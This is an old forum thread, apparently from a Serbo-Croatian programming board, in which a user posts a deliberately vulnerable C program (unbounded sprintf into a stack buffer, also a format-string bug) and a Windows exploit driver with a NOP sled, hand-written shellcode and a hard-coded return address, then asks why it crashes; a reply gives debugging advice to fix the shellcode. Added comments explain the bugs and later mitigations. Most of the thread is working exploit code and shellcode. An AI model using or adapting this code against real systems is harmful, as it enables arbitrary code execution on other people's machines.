[ `and @ 09.01.2005. 00:09 ] @
Vuln.c
Code:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
/*
 * Deliberately vulnerable target program from the post. Two defects are
 * visible in the body below:
 *  - argv[1] is handed to sprintf() as the FORMAT string, so any '%'
 *    directive in the argument is interpreted (format-string bug), and the
 *    copy into the 100-byte stack buffer has no bound (stack overflow).
 *  - argc is never checked; run with no argument, argv[1] is NULL and
 *    sprintf() dereferences it.
 * The hardened equivalent would be
 *     if (argc < 2) return 1;
 *     snprintf(buffer, sizeof buffer, "%s", argv[1]);
 * Modern compilers flag the non-literal format (-Wformat-security), and
 * stack cookies, DEP and ASLR are designed to stop this class of overflow
 * on current systems. The code is left as posted because it is the
 * demonstration.
 */
char buffer[100];
sprintf(buffer,argv[1]);
return (0);
}


Exploit.c
Code:

#include <stdio.h>
#include <string.h>

main()
{
/*
 * Author's proof-of-concept driver for Vuln.c above (Windows, 2005-era).
 * It concatenates "vuln.exe " and a payload into one command line and
 * hands it to system(); vuln.exe then sprintf()s the whole argument into
 * its 100-byte stack buffer with no bound, so everything past byte 100 of
 * the argument is written beyond the buffer. Whether that reaches the saved
 * return address depends on the compiler's frame layout, which the page
 * does not show.
 *
 * Review notes on the code as posted:
 *  - `main()` with no return type is implicit int (removed in C99) and
 *    system() is called without <stdlib.h>, so this only builds on lenient
 *    toolchains. No value is returned either.
 *  - ret[] is a hard-coded absolute address; that dependence on one exact
 *    stack layout is what ASLR was later introduced to break, and DEP /
 *    stack cookies would likely stop the overwrite earlier on a current
 *    system.
 *  - The payload passes through the command interpreter via system(), so
 *    any byte the shell treats specially would alter it before vuln.exe
 *    sees it — TODO confirm for the bytes used here.
 */
char filename[] = "vuln.exe ";   // target program plus the separating space

/* 51 author-supplied machine-code bytes; per the post they are meant to
 * launch netstat. Treated as opaque here — not decoded or verified. */
char shellcode[] =  "\x55\x8B\xEC\x33\xFF\x57"
                    "\xC6\x45\xF8\x4E"
                    "\xC6\x45\xF9\x45"
                    "\xC6\x45\xFA\x54"
                    "\xC6\x45\xFB\x53"
                    "\xC6\x45\xFC\x54"
                    "\xC6\x45\xFD\x41"
                    "\xC6\x45\xFE\x54"
                    "\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes

/* 45-byte sled of 0x90 (x86 NOP) placed ahead of the code, so that an
 * imprecise return address still lands on something executable. */
char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes
              

/* Value meant to replace the saved return address (presumably the
 * little-endian 32-bit address 0x0012FEA4). strcat() stops at the literal's
 * "\x00", so only 3 bytes are appended; the fourth byte of the slot is the
 * NUL that sprintf() in vuln.exe writes at the end of its copy. */
char ret[] = "\xA4\xFE\x12\x00";

static char buffer[1000];        // static → zero-initialised, so strcat() starts from ""
strcat(buffer,filename);
strcat(buffer,nops);             // argument bytes   0.. 44
strcat(buffer, shellcode);       // argument bytes  45.. 95
strcat(buffer,"IvanBBBB");       // argument bytes  96..103: filler straddling the end of the 100-byte buffer
strcat(buffer,ret);              // argument bytes 104..106 (+ NUL at 107): the intended overwrite slot
system(buffer);                  // runs "vuln.exe <payload>" through the command interpreter
}


I zašto ovo ne radi? A kada hoću npr. da pokrenem cmd, ono radi! Probao sam da pokrenem Notepad i neće; u ovom primeru pokušam da pokrenem netstat i neće!
Kaže da nešto nije u redu sa ESP, tj. program mi se sruši odmah nakon RET!

tnx
[ Sundance @ 09.01.2005. 23:38 ] @
Pa otvori lijepo u debuggeru i vidi na što ti pokazuje ESP u trenutku kad dobiješ page fault. I onda popravi shellcode (dodaj još NOP-ova, votevr).